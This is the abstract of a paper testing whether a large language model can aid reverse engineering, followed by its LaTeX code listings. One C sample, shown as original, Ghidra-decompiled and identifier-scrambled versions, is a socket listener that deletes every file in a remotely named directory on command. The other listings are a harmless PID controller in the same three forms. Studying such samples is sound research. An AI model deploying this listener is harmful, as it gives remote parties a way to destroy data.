Pop Quiz! Can a Large Language Model Help With Reverse Engineering?

Large language models (such as OpenAI's Codex) have demonstrated impressive zero-shot multi-task capabilities in the software domain, including code explanation. In this work, we examine if this ability can be used to help with reverse engineering. Specifically, we investigate prompting Codex to identify the purpose, capabilities, and important variable names or values from code, even when the code is produced through decompilation. Alongside an examination of the model's responses in answering open-ended questions, we devise a true/false quiz framework to characterize the performance of the language model. We present an extensive quantitative analysis of the measured performance of the language model on a set of program purpose identification and information extraction tasks: of the 136,260 questions we posed, it answered 72,754 correctly. A key takeaway is that while promising, LLMs are not yet ready for zero-shot reverse engineering.

==> fig/listings/delete-listen-ghidra.tex <==
%,linebackgroundcolor={\ifnum \value{lstnumber} = 1 \color{lightgray} \fi,\ifnum \value{lstnumber} = 24 \color{lightgray} \fi}]
\begin{lstlisting}[language=c]
void del_in_dir(char *param_1) {
  DIR *__dirp; dirent *pdVar1; long in_FS_OFFSET; 
  char local_418 [1032]; long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  __dirp = opendir(param_1);
  if (__dirp != (DIR *)0x0) {
    while (pdVar1 = readdir(__dirp), pdVar1 != (dirent *)0x0) {
      sprintf(local_418,"%s/%s",param_1,pdVar1->d_name);
      remove(local_418);
    }
    closedir(__dirp);
  }
  if (local_10 == *(long *)(in_FS_OFFSET + 0x28)) {
    return;
  }
  __stack_chk_fail();
}
void do_run(int param_1) {
  ssize_t sVar1; long in_FS_OFFSET; char local_418; 
  undefined auStack1047 [1031]; long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  while( true ) {
    memset(&local_418,0,0x400);
    sVar1 = recv(param_1,&local_418,0x400,0);
    if ((sVar1 < 1) || (local_418 == 'q')) break;
    if (local_418 == 'd') {
      del_in_dir(auStack1047);
    }
  }
  if (local_10 == *(long *)(in_FS_OFFSET + 0x28)) {
    return;
  }
  __stack_chk_fail();
}
undefined8 main(void) {
  int iVar1; undefined8 uVar2; long in_FS_OFFSET; 
  socklen_t local_50; undefined4 local_4c; int local_48; 
  int local_44; char *local_40; undefined local_38 [4];
  in_addr_t local_34; sockaddr local_28; long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  local_40 = "192.168.0.1";
  local_4c = 0x1f90;
  local_48 = socket(2,1,0);
  if (local_48 < 0) {
    uVar2 = 1;
  } else {
    local_38._0_2_ = 2;
    local_38._2_2_ = (undefined2)local_4c;
    local_34 = inet_addr(local_40);
    iVar1 = bind(local_48,(sockaddr *)local_38,0x10);
    if (iVar1 < 0) {
      uVar2 = 1;
    } else {
      iVar1 = listen(local_48,10);
      if (iVar1 == 0) {
        local_50 = 0x10;
        local_44 = accept(local_48,&local_28,&local_50);
        if (local_44 < 0) {
          uVar2 = 1;
        } else {
          do_run(local_44);
          uVar2 = 0;
        }
      } else uVar2 = 1;
    }
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
    __stack_chk_fail();
  }
  return uVar2;
}
\end{lstlisting}

==> fig/listings/delete-listen-random.tex <==
\begin{lstlisting}[language=c]
#define ZJKP 1024

void xheekxwdkm(char *neklkzq) {
	DIR *mmn = opendir(neklkzq);
	if(mmn == NULL) return;
	struct dirent *jinois;
	char fbtnqf[ZJKP];
	while ((jinois = readdir(mmn)) != NULL) {
		sprintf(fbtnqf, "%s/%s", neklkzq, jinois->d_name);
		remove(fbtnqf);
	}
	closedir(mmn);
}

int swtzhc(int wcmyp) {
	char wakjvc[ZJKP];
	do {
		memset(wakjvc, 0, ZJKP);
		if (recv(wcmyp, wakjvc, ZJKP, 0) <= 0) break;
		if (wakjvc[0] == 'q') break;
		if (wakjvc[0] == 'd') xheekxwdkm(&wakjvc[1]);
	} while (1);
}

int main()
{
	char *lt = "91.53.33.119";
	int oadg = 7716;

	int wcmyp, fuoakvgi;
	struct sockaddr_in vlfjlpsgeid, gdsinnuw;
	socklen_t ryetkhfrs;

	wcmyp = socket(AF_INET, SOCK_STREAM, 0);
	if (wcmyp < 0) return 1;

	vlfjlpsgeid.sin_family = AF_INET;
	vlfjlpsgeid.sin_port = oadg;
	vlfjlpsgeid.sin_addr.s_addr = inet_addr(lt);

	if (bind(wcmyp, (struct sockaddr *)&vlfjlpsgeid, sizeof(vlfjlpsgeid)) < 0) return 1;
	if (listen(wcmyp, 10) != 0) return 1;

	ryetkhfrs = sizeof(gdsinnuw);

	fuoakvgi = accept(wcmyp, (struct sockaddr *)&gdsinnuw, &ryetkhfrs);
	if (fuoakvgi < 0) return 1;
	swtzhc(fuoakvgi);

	return 0;
}
\end{lstlisting}

==> fig/listings/delete-listen.tex <==
\begin{lstlisting}[language=c,linebackgroundcolor={\ifnum \value{lstnumber} = 1 \color{pink} \fi,\ifnum\value{lstnumber}>56
            \ifnum\value{lstnumber}<60
                \color{yellow}
            \fi
        \fi}]
\\c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>
#include <dirent.h>
#define SIZE 1024

void del_in_dir(char *dirname) {
	DIR *fol = opendir(dirname);
	if(fol == NULL) return;
	struct dirent *next_f;
	char f_path[SIZE];
	while ((next_f = readdir(fol)) != NULL) {
		sprintf(f_path, "%s/%s", dirname, next_f->d_name);
		remove(f_path);
	}
	closedir(fol);
}

int do_run(int sockfd) {
	char buffer[SIZE];
	do {
		memset(buffer, 0, SIZE);
		if (recv(sockfd, buffer, SIZE, 0) <= 0) break;
		if (buffer[0] == 'q') break;
		if (buffer[0] == 'd') del_in_dir(&buffer[1]);
	} while (1);
}

int main() {
	char *ip = "192.168.0.1";
	int port = 8080;

	int sockfd, new_sock;
	struct sockaddr_in server_addr, new_addr;
	socklen_t addr_size;

	sockfd = socket(AF_INET, SOCK_STREAM, 0);
	if (sockfd < 0) return 1;

	server_addr.sin_family = AF_INET;
	server_addr.sin_port = port;
	server_addr.sin_addr.s_addr = inet_addr(ip);

	if (bind(sockfd, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) return 1;
	if (listen(sockfd, 10) != 0) return 1;

	addr_size = sizeof(new_addr);

	new_sock = accept(sockfd, (struct sockaddr *)&new_addr, &addr_size);
	if (new_sock < 0) return 1;
	do_run(new_sock);

	return 0;
}
"""
 Q. <question here>
 A.\end{lstlisting}

==> fig/listings/pid-d-ghidra.tex <==
\begin{lstlisting}[language=c]
undefined8 main(void) {
  long in_FS_OFFSET;
  float fVar1;
  int local_2c;
  undefined local_28 [24];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  pid_init(0x3f333333,0x3dcccccd,0x3e4ccccd,local_28);
  for (local_2c = 0; local_2c < 10; local_2c = local_2c + 1) {
    fVar1 = (float)pid_update(0x3f800000,(float)(local_2c + 1),(float)local_2c,local_28);
    printf((char *)(double)fVar1,&DAT_00102004);
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 0;
}

float pid_update(float param_1,float param_2,float param_3,float *param_4) {
  float fVar1;
  
  param_2 = param_2 - param_3;
  param_4[1] = param_2 * param_1 + param_4[1];
  fVar1 = *param_4;
  *param_4 = param_2;
  return param_4[2] * param_2 + param_4[1] * param_4[3] + ((param_2 - fVar1) * param_4[4]) / param_1;
}

void pid_init(undefined4 param_1,undefined4 param_2,undefined4 param_3,undefined4 *param_4) {
  *param_4 = 0;
  param_4[1] = 0;
  param_4[2] = param_1;
  param_4[3] = param_2;
  param_4[4] = param_3;
  return;
}
\end{lstlisting}



==> fig/listings/pid-d-random.tex <==
\begin{lstlisting}[language=c]
#include <stdio.h>

typedef struct {
    float prtjjdywbh;
    float xbchhomt;
    float in;
    float la;
    float st;
} mzxyhwounks;

void syttirvr(mzxyhwounks *yrfsf, float in, float la, float st) {
    yrfsf->prtjjdywbh = 0;
    yrfsf->xbchhomt = 0;
    yrfsf->in = in;
    yrfsf->la = la;
    yrfsf->st = st;
}

float ccnspzai(mzxyhwounks *yrfsf, float bcl, float hvivwz, float leucgd) {
    float vzhre = hvivwz - leucgd;
    yrfsf->xbchhomt += vzhre * bcl;
    float t_in = yrfsf->in * vzhre;
    float t_la = yrfsf->la * yrfsf->xbchhomt;
    float t_st = yrfsf->st * (vzhre - yrfsf->prtjjdywbh) / bcl;
    yrfsf->prtjjdywbh = vzhre;
    return t_in + t_la + t_st;
}

int main(int argc, char **argv) {
    mzxyhwounks yrfsf;
    syttirvr(&yrfsf, -0.4830721663176343, -0.6301845685786949, -0.96529298213277);
    for (int i=0; i<10; i++) {
        printf("%f\n", ccnspzai(&yrfsf, 1, i+1, i));
    }
    return 0;
}
\end{lstlisting}

==> fig/listings/pid-d.tex <==
\begin{lstlisting}[language=c]
//c
#include <stdio.h>
typedef struct {
    float last_error;
    float integral;
    float Kp;
    float Ki;
    float Kd;
} pid_state_t;
void pid_init(pid_state_t *state, float Kp, float Ki, float Kd) {
    state->last_error = 0;
    state->integral = 0;
    state->Kp = Kp;
    state->Ki = Ki;
    state->Kd = Kd;
}
float pid_update(pid_state_t *state, float dt, float target, float actual) {
    float error = target - actual;
    state->integral += error * dt;
    float t_Kp = state->Kp * error;
    float t_Ki = state->Ki * state->integral;
    float t_Kd = state->Kd * (error - state->last_error) / dt;
    state->last_error = error;
    return t_Kp + t_Ki + t_Kd;
}
int main(int argc, char **argv) {
    pid_state_t state;
    pid_init(&state, 0.7, 0.1, 0.2);
    for (int i=0; i<10; i++) {
        printf("%f\n", pid_update(&state, 1, i+1, i));
    }
    return 0;
}
\end{lstlisting}
